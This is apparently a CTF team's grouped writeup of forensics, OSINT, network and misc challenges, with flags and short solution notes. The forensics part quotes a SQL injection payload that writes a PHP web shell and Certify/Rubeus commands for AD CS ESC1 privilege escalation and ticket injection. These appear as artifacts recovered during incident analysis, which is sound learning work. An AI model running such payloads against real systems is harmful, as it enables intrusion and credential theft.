KubSTU 2026 Writeup — Part 2: Forensics, OSINT, Network, Misc
This is the second KubSTU 2026 grouped writeup, covering the remaining categories: Forensics, OSINT, Network, and Misc.
Forensics
Demo
A security audit of a web and database server. Apache logs showed sqlmap from 192.168.1.100 hitting an SQL injection in index.php:
$id = $_GET['id'];
$sql = "SELECT title, content FROM articles WHERE id = $id";
The attacker wrote a web shell via INTO OUTFILE:
GET /index.php?id=1 UNION SELECT 1,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/uploads/shell.php'
Then used the shell to read config.php, which contained DB SSH credentials and a private key. The key matched DB/home/dbadmin/.ssh_authorized_keys; auth.log confirmed the lateral move as dbadmin. Finally, .bash_history showed the exfiltration:
cp /var/lib/mysql/confidential_data.sql /tmp/.backup_data
Flag: KubSTU{SQLi,shell.php,dbadmin,confidential_data.sql}
Vanilla Raw
Memory forensics on a tmpfs-backed artifact. The flag came from recovering unlinked file contents in a raw memory image.
Flag: KubSTU{m3m0ry_unl1nk3d_tmpfs_f0r3ns1cs}
Wirepass
A network capture themed around penguins and capybaras. The flag surfaced from flow analysis or embedded protocol data.
Flag: KubSTU{p1ngu1n_0p_k4p1b4r0v5k_f4ll5}
Is the report in English?
A PDF metadata and embedded-file challenge. Decoding the right PDF object stream and filtering for real KubSTU{...} strings among decoys gave the flag.
Flag: KubSTU{PDF_M3t4d4t4_F0r3ns1cs_4dv4nc3d_Ch4ll3ng3_2025_S3cur3_Emb3dd3d_F1l3_3ncrypt10n_Pr0t0c0l}
Mutant
Another PDF object-stream puzzle with decoy flags mixed into decompressed text-content streams. A direct regex for the real KubSTU{...} format picked out the genuine flag.
Flag: KubSTU{pdf_0bj3ct_m4st3r_v2}
Tunnel
DNS exfiltration over a hex-encoded tunnel. The attacker routed data through DNS queries; decoding the hex payload revealed the flag.
Flag: KubSTU{d0nt_tru5t_th3_dn5_qu3r135_v1a_h3x}
Ratte
A malware-forensics trace. After reversing the sample and following its behavior, the flag was extracted from command output or embedded strings.
Flag: KubSTU{n0_m0r3_gr3pp1ng_1n_th3_d4rk_v2}
We have an incident
The heaviest forensics challenge: two KAPE-style host collections (HR/ and AD/). The attack chain was reconstructed from Sysmon and PowerShell logs:
- Initial access:
WINWORD.EXEopenedРезюме.docm, which spawned a hidden PowerShell bootstrap. - Privilege escalation: AD CS abuse via an ESC1 vulnerable template.
Certify.exe request /ca:DC1.kuban.loc\kuban-DC1-CA /template:VulnerableUserSAN /altname:adminRubeus.exe asktgt /user:admin /certificate:C:\Users\Public\admin.pfx /password: /nowrap /ptt
- Post-exploitation tools, in launch order:
Резюме.docmCertify.exeRubeus.exemimikatz.exewlmss.exe
- Exfiltration:
0-40e10000-admin@krbtgt~kuban.loc-KUBAN.LOC.kirbintds.dit
Flag:
KubSTU{ESC1:Резюме.docm_Certify.exe_Rubeus.exe_mimikatz.exe_wlmss.exe:0-40e10000-admin@krbtgt~kuban.loc-KUBAN.LOC.kirbi_ntds.dit}
OSINT
City that doesn’t exist
A children’s themed park in a southern Russian mall: Minopolis in OZ Mall, Krasnodar, renamed to ZkidZ City in 2019. The operating legal entity was not the obvious ООО «ТПКО МИНОПОЛИС КРАСНОДАР» (already excluded from EGRUL before the park opened), but ООО «ДЕТСТВО+», INN 2312206762. The Rospatent trademark MINOPOLIS №723853 was filed on 20.12.2018.
Flag: KubSTU{2312206762_20.12.2018} (solved post-competition)
Morning without coordinates
A photo with “АВТОВОКЗАЛ” on the roof and a hilly background matched the Gelendjik bus station. 2GIS/OSM gave the address: Геленджик, Объездная улица, 3.
Flag: KubSTU{Gelendzhik_Obyezdnaya_3}
Bad OpSec
A boarding-pass photo with a PDF417 barcode decoded to a standard IATA BCBP string:
M1PETLITSA/ALEKSEI IGOE93KTGB KRRSVXU6 0210 046Y017D0003 151>218 ...
KRR→ Krasnodar (departure)SVX→ Yekaterinburg (arrival)U6 0210→ Ural Airlines flight U6210, 15 Feb 2026- Scheduled arrival: 17:20
Flag: KubSTU{U6210_Yekaterinburg_17:20}
Minute of fame
The flag was explicitly present in the challenge description.
Flag: KubSTU{TVChannelName_ReleaseDate}
Network
Nut legends
A Packet Tracer project gave a Cisco network topology: PC COOPER R. at 10.10.10.10/24, a router-on-a-stick Mastif_0828, and Server#1 at 10.20.20.100/24. The switch description on Fa0/10 was Linked_by_14mB4mb00zl3r. HTTP on the server hinted that a key was “archived in copyrights,” and copyrights.html contained kubstu(end_user_license_agreement) inside the Cisco EULA.
Using copyrights as a stego key, outguess extraction from the embedded JPEG blobs produced a 5625-byte second-stage artifact, but the blob did not identify as a known format and the challenge remained unsolved.
Status: UNSOLVED
Misc
Start
The welcome sanity check.
Flag: KubSTU{1ets_g0}
Mobile WAF
A service asked us to classify 100 HTTP requests as Block or Allow. The classification logic was author-specific rather than signature-based, with inconsistent endpoint-dependent rules. We reached 79/100 but could not fully reverse the black-box policy.
Flag: TBD
Takeaways
- Forensics: Timestamps matter. The order of process launches, not file creation or first network visibility, is what the flag format often asks for.
- Forensics: AD CS ESC1 abuse leaves clear artifacts (
Certify.exe,Rubeus.exe, TGT export) when the host collection is complete. - OSINT: The obvious legal entity is frequently a decoy. Always check EGRUL status dates and actual operator job postings.
- OSINT: IATA BCBP barcodes carry enough structured data to recover flight, city, and time without any external search.
- Network: When a challenge hands you a Packet Tracer topology and a single keyword (
copyrights), treat it as a stego key and verify with a round-trip test before declaring extraction broken.